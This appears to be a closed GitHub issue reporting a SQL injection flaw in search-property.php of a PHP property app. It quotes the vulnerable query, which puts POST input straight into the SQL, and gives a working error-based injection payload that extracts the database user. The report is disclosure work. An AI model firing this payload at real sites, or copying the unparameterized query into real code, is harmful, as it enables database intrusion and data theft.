Skip to content

SQL injection vulnerability exists in search-property.php #7

Closed
@huclilu

Description

@huclilu

Build environment: Apache 2.4.39; MySQL5.7.26; PHP7.3.4

SQL injection vulnerability exists in search-property.php

In search property In PHP, in lines 52-54 of the code, search_ The property is transferred to the backend through the post request and assigned to the variable $q_ String, and then it is substituted into the database for fuzzy query, and then mysqli is used_ The query function returns the result of the data query

$q_string = $_POST['search_property'];
$sql="SELECT * FROM add_property where concat(zone,district,province,city,tole,property_type,country) like '%$q_string%'";
    $query=mysqli_query($db,$sql);

POC:

123' or (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a)-- ace

SQL injection to obtain the current user

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions